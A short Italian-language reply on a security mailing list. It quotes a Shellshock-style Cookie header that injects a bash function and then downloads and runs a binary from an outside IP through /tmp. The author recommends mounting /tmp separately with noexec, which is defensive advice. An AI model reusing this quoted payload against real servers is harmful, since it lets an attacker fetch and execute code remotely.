ciao Jan,

> Cookie:() { :; }; wget -O /tmp/besh http://162.253.66.76/nginx; chmod
> 777 /tmp/besh; /tmp/besh;{0D}{0A}

ecco un buon motivo per montare /tmp su un FS a parte e in modalita' no-exec

ciao

-- 
Paolo Pedaletti
www.openlabs.it
http://www.ecis.eu/documents/Finalversion_Consumerchoicepaper.pdf
http://linguistico.sourceforge.net/pages/traduzioni/ms_illegal.html

________________________________________________________
http://www.sikurezza.org - Italian Security Mailing List

Rispondere a